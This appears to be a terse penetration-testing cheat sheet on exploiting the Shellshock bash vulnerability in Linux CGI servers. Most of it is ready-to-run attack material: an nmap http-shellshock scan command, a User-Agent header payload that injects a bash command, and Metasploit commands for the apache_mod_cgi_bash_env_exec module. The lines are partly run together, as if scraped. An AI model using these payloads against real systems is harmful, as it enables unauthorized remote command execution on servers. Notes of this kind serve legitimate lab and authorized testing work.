Linux
Shellshock vulnerability
PoC
nmap scan
exploitation
metasploit
FTP
SSH
Samba
Last updated
Last updated
nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgiUser Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'use exploit/multi/http/apache_mod_cgi_bash_env_exec
#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit